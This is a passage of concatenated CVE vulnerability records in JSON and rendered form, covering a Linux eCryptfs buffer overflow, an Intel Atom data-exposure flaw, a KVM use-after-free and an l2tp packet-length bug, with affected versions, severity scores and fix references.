"version": "dddfa461fc8951f9b5f951c13565b6cac678635a",
"versionType": "git"
},
{
"lessThan": "a20f09452e2f58f761d11ad7b96b5c894c91030e",
"status": "affected",
"version": "dddfa461fc8951f9b5f951c13565b6cac678635a",
"versionType": "git"
},
{
"lessThan": "f6008487f1eeb8693f8d2a36a89c87d9122ddf74",
"status": "affected",
"version": "dddfa461fc8951f9b5f951c13565b6cac678635a",
"versionType": "git"
},
{
"lessThan": "85a6a1aff08ec9f5b929d345d066e2830e8818e5",
"status": "affected",
"version": "dddfa461fc8951f9b5f951c13565b6cac678635a",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/ecryptfs/keystore.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.21"
},
{
"lessThan": "2.6.21",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "2.6.21",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "2.6.21",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "2.6.21",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "2.6.21",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "2.6.21",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "2.6.21",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.12",
"versionStartIncluding": "2.6.21",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.3",
"versionStartIncluding": "2.6.21",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "2.6.21",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\necryptfs: Fix buffer size for tag 66 packet\n\nThe \u0027TAG 66 Packet Format\u0027 description is missing the cipher code and\nchecksum fields that are packed into the message packet. As a result,\nthe buffer allocated for the packet is 3 bytes too small and\nwrite_tag_66_packet() will write up to 3 bytes past the end of the\nbuffer.\n\nFix this by increasing the size of the allocation so the whole packet\nwill always fit in the buffer.\n\nThis fixes the below kasan slab-out-of-bounds bug:\n\n BUG: KASAN: slab-out-of-bounds in ecryptfs_generate_key_packet_set+0x7d6/0xde0\n Write of size 1 at addr ffff88800afbb2a5 by task touch/181\n\n CPU: 0 PID: 181 Comm: touch Not tainted 6.6.13-gnu #1 4c9534092be820851bb687b82d1f92a426598dc6\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2/GNU Guix 04/01/2014\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x4c/0x70\n print_report+0xc5/0x610\n ? ecryptfs_generate_key_packet_set+0x7d6/0xde0\n ? kasan_complete_mode_report_info+0x44/0x210\n ? ecryptfs_generate_key_packet_set+0x7d6/0xde0\n kasan_report+0xc2/0x110\n ? ecryptfs_generate_key_packet_set+0x7d6/0xde0\n __asan_store1+0x62/0x80\n ecryptfs_generate_key_packet_set+0x7d6/0xde0\n ? __pfx_ecryptfs_generate_key_packet_set+0x10/0x10\n ? __alloc_pages+0x2e2/0x540\n ? __pfx_ovl_open+0x10/0x10 [overlay 30837f11141636a8e1793533a02e6e2e885dad1d]\n ? dentry_open+0x8f/0xd0\n ecryptfs_write_metadata+0x30a/0x550\n ? __pfx_ecryptfs_write_metadata+0x10/0x10\n ? ecryptfs_get_lower_file+0x6b/0x190\n ecryptfs_initialize_file+0x77/0x150\n ecryptfs_create+0x1c2/0x2f0\n path_openat+0x17cf/0x1ba0\n ? __pfx_path_openat+0x10/0x10\n do_filp_open+0x15e/0x290\n ? __pfx_do_filp_open+0x10/0x10\n ? __kasan_check_write+0x18/0x30\n ? _raw_spin_lock+0x86/0xf0\n ? __pfx__raw_spin_lock+0x10/0x10\n ? __kasan_check_write+0x18/0x30\n ? alloc_fd+0xf4/0x330\n do_sys_openat2+0x122/0x160\n ? __pfx_do_sys_openat2+0x10/0x10\n __x64_sys_openat+0xef/0x170\n ? __pfx___x64_sys_openat+0x10/0x10\n do_syscall_64+0x60/0xd0\n entry_SYSCALL_64_after_hwframe+0x6e/0xd8\n RIP: 0033:0x7f00a703fd67\n Code: 25 00 00 41 00 3d 00 00 41 00 74 37 64 8b 04 25 18 00 00 00 85 c0 75 5b 44 89 e2 48 89 ee bf 9c ff ff ff b8 01 01 00 00 0f 05 \u003c48\u003e 3d 00 f0 ff ff 0f 87 85 00 00 00 48 83 c4 68 5d 41 5c c3 0f 1f\n RSP: 002b:00007ffc088e30b0 EFLAGS: 00000246 ORIG_RAX: 0000000000000101\n RAX: ffffffffffffffda RBX: 00007ffc088e3368 RCX: 00007f00a703fd67\n RDX: 0000000000000941 RSI: 00007ffc088e48d7 RDI: 00000000ffffff9c\n RBP: 00007ffc088e48d7 R08: 0000000000000001 R09: 0000000000000000\n R10: 00000000000001b6 R11: 0000000000000246 R12: 0000000000000941\n R13: 0000000000000000 R14: 00007ffc088e48d7 R15: 00007f00a7180040\n \u003c/TASK\u003e\n\n Allocated by task 181:\n kasan_save_stack+0x2f/0x60\n kasan_set_track+0x29/0x40\n kasan_save_alloc_info+0x25/0x40\n __kasan_kmalloc+0xc5/0xd0\n __kmalloc+0x66/0x160\n ecryptfs_generate_key_packet_set+0x6d2/0xde0\n ecryptfs_write_metadata+0x30a/0x550\n ecryptfs_initialize_file+0x77/0x150\n ecryptfs_create+0x1c2/0x2f0\n path_openat+0x17cf/0x1ba0\n do_filp_open+0x15e/0x290\n do_sys_openat2+0x122/0x160\n __x64_sys_openat+0xef/0x170\n do_syscall_64+0x60/0xd0\n entry_SYSCALL_64_after_hwframe+0x6e/0xd8"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:14:31.009Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/1c125b9287e58f364d82174efb167414b92b11f1"
},
{
"url": "https://git.kernel.org/stable/c/235b85981051cd68fc215fd32a81c6f116bfc4df"
},
{
"url": "https://git.kernel.org/stable/c/edbfc42ab080e78c6907d40a42c9d10b69e445c1"
},
{
"url": "https://git.kernel.org/stable/c/12db25a54ce6bb22b0af28010fff53ef9cb3fe93"
},
{
"url": "https://git.kernel.org/stable/c/0d0f8ba042af16519f1ef7dd10463a33b21b677c"
},
{
"url": "https://git.kernel.org/stable/c/2ed750b7ae1b5dc72896d7dd114c419afd3d1910"
},
{
"url": "https://git.kernel.org/stable/c/a20f09452e2f58f761d11ad7b96b5c894c91030e"
},
{
"url": "https://git.kernel.org/stable/c/f6008487f1eeb8693f8d2a36a89c87d9122ddf74"
},
{
"url": "https://git.kernel.org/stable/c/85a6a1aff08ec9f5b929d345d066e2830e8818e5"
}
],
"title": "ecryptfs: Fix buffer size for tag 66 packet",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-38578",
"datePublished": "2024-06-19T13:37:36.487Z",
"dateReserved": "2024-06-18T19:36:34.926Z",
"dateUpdated": "2025-11-04T17:21:32.595Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2023-28746 (GCVE-0-2023-28746)
Vulnerability from cvelistv5
Published
2024-03-14 16:45
Modified
2025-04-26 20:03
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- information disclosure
- CWE-1342 - Information exposure through microarchitectural state after transient execution from some register files
Summary
Information exposure through microarchitectural state after transient execution from some register files for some Intel(R) Atom(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| n/a | Intel(R) Atom(R) Processors |
Version: See references |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-28746",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-14T18:58:08.088339Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:28:56.120Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-04-26T20:03:13.216Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00898.html",
"tags": [
"x_transferred"
],
"url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00898.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZON4TLXG7TG4A2XZG563JMVTGQW4SF3A/"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/H63LGAQXPEVJOES73U4XK65I6DASOAAG/"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EIUICU6CVJUIB6BPJ7P5QTPQR5VOBHFK/"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/03/12/13"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/05/msg00003.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"url": "http://xenbits.xen.org/xsa/advisory-452.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Intel(R) Atom(R) Processors",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "See references"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Information exposure through microarchitectural state after transient execution from some register files for some Intel(R) Atom(R) Processors may allow an authenticated user to potentially enable information disclosure via local access."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "information disclosure",
"lang": "en"
},
{
"cweId": "CWE-1342",
"description": "Information exposure through microarchitectural state after transient execution from some register files",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-25T22:08:21.946Z",
"orgId": "6dda929c-bb53-4a77-a76d-48e79601a1ce",
"shortName": "intel"
},
"references": [
{
"name": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00898.html",
"url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00898.html"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZON4TLXG7TG4A2XZG563JMVTGQW4SF3A/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/H63LGAQXPEVJOES73U4XK65I6DASOAAG/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EIUICU6CVJUIB6BPJ7P5QTPQR5VOBHFK/"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/03/12/13"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/05/msg00003.html"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "6dda929c-bb53-4a77-a76d-48e79601a1ce",
"assignerShortName": "intel",
"cveId": "CVE-2023-28746",
"datePublished": "2024-03-14T16:45:50.370Z",
"dateReserved": "2023-05-05T03:00:03.623Z",
"dateUpdated": "2025-04-26T20:03:13.216Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35791 (GCVE-0-2024-35791)
Vulnerability from cvelistv5
Published
2024-05-17 12:24
Modified
2025-05-04 12:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
KVM: SVM: Flush pages under kvm->lock to fix UAF in svm_register_enc_region()
Do the cache flush of converted pages in svm_register_enc_region() before
dropping kvm->lock to fix use-after-free issues where region and/or its
array of pages could be freed by a different task, e.g. if userspace has
__unregister_enc_region_locked() already queued up for the region.
Note, the "obvious" alternative of using local variables doesn't fully
resolve the bug, as region->pages is also dynamically allocated. I.e. the
region structure itself would be fine, but region->pages could be freed.
Flushing multiple pages under kvm->lock is unfortunate, but the entire
flow is a rare slow path, and the manual flush is only needed on CPUs that
lack coherency for encrypted memory.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 4f627ecde7329e476a077bb0590db8f27bb8f912 Version: 19a23da53932bc8011220bd8c410cb76012de004 Version: 19a23da53932bc8011220bd8c410cb76012de004 Version: 19a23da53932bc8011220bd8c410cb76012de004 Version: 19a23da53932bc8011220bd8c410cb76012de004 Version: 19a23da53932bc8011220bd8c410cb76012de004 Version: f1ecde00ce1694597f923f0d25f7a797c5243d99 Version: 848bcb0a1d96f67d075465667d3a1ad4af56311e |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:47.497Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2d13b79640b147bd77c34a5998533b2021a4122d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e126b508ed2e616d679d85fca2fbe77bb48bbdd7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4868c0ecdb6cfde7c70cf478c46e06bb9c7e5865"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/12f8e32a5a389a5d58afc67728c76e61beee1ad4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f6d53d8a2617dd58c89171a6b9610c470ebda38a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5ef1d8c1ddbf696e47b226e11888eaf8d9e8e807"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35791",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:42:51.101780Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:23.051Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/x86/kvm/svm/sev.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "2d13b79640b147bd77c34a5998533b2021a4122d",
"status": "affected",
"version": "4f627ecde7329e476a077bb0590db8f27bb8f912",
"versionType": "git"
},
{
"lessThan": "e126b508ed2e616d679d85fca2fbe77bb48bbdd7",
"status": "affected",
"version": "19a23da53932bc8011220bd8c410cb76012de004",
"versionType": "git"
},
{
"lessThan": "4868c0ecdb6cfde7c70cf478c46e06bb9c7e5865",
"status": "affected",
"version": "19a23da53932bc8011220bd8c410cb76012de004",
"versionType": "git"
},
{
"lessThan": "12f8e32a5a389a5d58afc67728c76e61beee1ad4",
"status": "affected",
"version": "19a23da53932bc8011220bd8c410cb76012de004",
"versionType": "git"
},
{
"lessThan": "f6d53d8a2617dd58c89171a6b9610c470ebda38a",
"status": "affected",
"version": "19a23da53932bc8011220bd8c410cb76012de004",
"versionType": "git"
},
{
"lessThan": "5ef1d8c1ddbf696e47b226e11888eaf8d9e8e807",
"status": "affected",
"version": "19a23da53932bc8011220bd8c410cb76012de004",
"versionType": "git"
},
{
"status": "affected",
"version": "f1ecde00ce1694597f923f0d25f7a797c5243d99",
"versionType": "git"
},
{
"status": "affected",
"version": "848bcb0a1d96f67d075465667d3a1ad4af56311e",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/x86/kvm/svm/sev.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.11"
},
{
"lessThan": "5.11",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "5.10.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "5.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "5.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "5.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "5.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.19.176",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.4.98",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: SVM: Flush pages under kvm-\u003elock to fix UAF in svm_register_enc_region()\n\nDo the cache flush of converted pages in svm_register_enc_region() before\ndropping kvm-\u003elock to fix use-after-free issues where region and/or its\narray of pages could be freed by a different task, e.g. if userspace has\n__unregister_enc_region_locked() already queued up for the region.\n\nNote, the \"obvious\" alternative of using local variables doesn\u0027t fully\nresolve the bug, as region-\u003epages is also dynamically allocated. I.e. the\nregion structure itself would be fine, but region-\u003epages could be freed.\n\nFlushing multiple pages under kvm-\u003elock is unfortunate, but the entire\nflow is a rare slow path, and the manual flush is only needed on CPUs that\nlack coherency for encrypted memory."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:55:45.574Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/2d13b79640b147bd77c34a5998533b2021a4122d"
},
{
"url": "https://git.kernel.org/stable/c/e126b508ed2e616d679d85fca2fbe77bb48bbdd7"
},
{
"url": "https://git.kernel.org/stable/c/4868c0ecdb6cfde7c70cf478c46e06bb9c7e5865"
},
{
"url": "https://git.kernel.org/stable/c/12f8e32a5a389a5d58afc67728c76e61beee1ad4"
},
{
"url": "https://git.kernel.org/stable/c/f6d53d8a2617dd58c89171a6b9610c470ebda38a"
},
{
"url": "https://git.kernel.org/stable/c/5ef1d8c1ddbf696e47b226e11888eaf8d9e8e807"
}
],
"title": "KVM: SVM: Flush pages under kvm-\u003elock to fix UAF in svm_register_enc_region()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35791",
"datePublished": "2024-05-17T12:24:49.520Z",
"dateReserved": "2024-05-17T12:19:12.339Z",
"dateUpdated": "2025-05-04T12:55:45.574Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26752 (GCVE-0-2024-26752)
Vulnerability from cvelistv5
Published
2024-04-03 17:00
Modified
2025-05-04 12:54
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
l2tp: pass correct message length to ip6_append_data
l2tp_ip6_sendmsg needs to avoid accounting for the transport header
twice when splicing more data into an already partially-occupied skbuff.
To manage this, we check whether the skbuff contains data using
skb_queue_empty when deciding how much data to append using
ip6_append_data.
However, the code which performed the calculation was incorrect:
ulen = len + skb_queue_empty(&sk->sk_write_queue) ? transhdrlen : 0;
...due to C operator precedence, this ends up setting ulen to
transhdrlen for messages with a non-zero length, which results in
corrupted packets on the wire.
Add parentheses to correct the calculation in line with the original
intent.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 559d697c5d072593d22b3e0bd8b8081108aeaf59 Version: 1fc793d68d50dee4782ef2e808913d5dd880bcc6 Version: 96b2e1090397217839fcd6c9b6d8f5d439e705ed Version: cd1189956393bf850b2e275e37411855d3bd86bb Version: f6a7182179c0ed788e3755ee2ed18c888ddcc33f Version: 9d4c75800f61e5d75c1659ba201b6c0c7ead3070 Version: 9d4c75800f61e5d75c1659ba201b6c0c7ead3070 Version: 9d4c75800f61e5d75c1659ba201b6c0c7ead3070 Version: 7626b9fed53092aa2147978070e610ecb61af844 Version: fe80658c08e3001c80c5533cd41abfbb0e0e28fd |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26752",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-03T18:05:57.024676Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:48:58.719Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.330Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4c3ce64bc9d36ca9164dd6c77ff144c121011aae"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c1d3a84a67db910ce28a871273c992c3d7f9efb5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dcb4d14268595065c85dc5528056713928e17243"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0da15a70395182ee8cb75716baf00dddc0bea38d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/13cd1daeea848614e585b2c6ecc11ca9c8ab2500"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/804bd8650a3a2bf3432375f8c97d5049d845ce56"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/83340c66b498e49353530e41542500fc8a4782d6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/359e54a93ab43d32ee1bff3c2f9f10cb9f6b6e79"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/l2tp/l2tp_ip6.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "4c3ce64bc9d36ca9164dd6c77ff144c121011aae",
"status": "affected",
"version": "559d697c5d072593d22b3e0bd8b8081108aeaf59",
"versionType": "git"
},
{
"lessThan": "c1d3a84a67db910ce28a871273c992c3d7f9efb5",
"status": "affected",
"version": "1fc793d68d50dee4782ef2e808913d5dd880bcc6",
"versionType": "git"
},
{
"lessThan": "dcb4d14268595065c85dc5528056713928e17243",
"status": "affected",
"version": "96b2e1090397217839fcd6c9b6d8f5d439e705ed",
"versionType": "git"
},
{
"lessThan": "0da15a70395182ee8cb75716baf00dddc0bea38d",
"status": "affected",
"version": "cd1189956393bf850b2e275e37411855d3bd86bb",
"versionType": "git"
},
{
"lessThan": "13cd1daeea848614e585b2c6ecc11ca9c8ab2500",
"status": "affected",
"version": "f6a7182179c0ed788e3755ee2ed18c888ddcc33f",
"versionType": "git"
},
{
"lessThan": "804bd8650a3a2bf3432375f8c97d5049d845ce56",
"status": "affected",
"version": "9d4c75800f61e5d75c1659ba201b6c0c7ead3070",
"versionType": "git"
},
{
"lessThan": "83340c66b498e49353530e41542500fc8a4782d6",
"status": "affected",
"version": "9d4c75800f61e5d75c1659ba201b6c0c7ead3070",
"versionType": "git"
},
{
"lessThan": "359e54a93ab43d32ee1bff3c2f9f10cb9f6b6e79",
"status": "affected",
"version": "9d4c75800f61e5d75c1659ba201b6c0c7ead3070",
"versionType": "git"
},
{
"status": "affected",
"version": "7626b9fed53092aa2147978070e610ecb61af844",
"versionType": "git"
},
{
"status": "affected",
"version": "fe80658c08e3001c80c5533cd41abfbb0e0e28fd",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/l2tp/l2tp_ip6.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.6"
},
{
"lessThan": "6.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
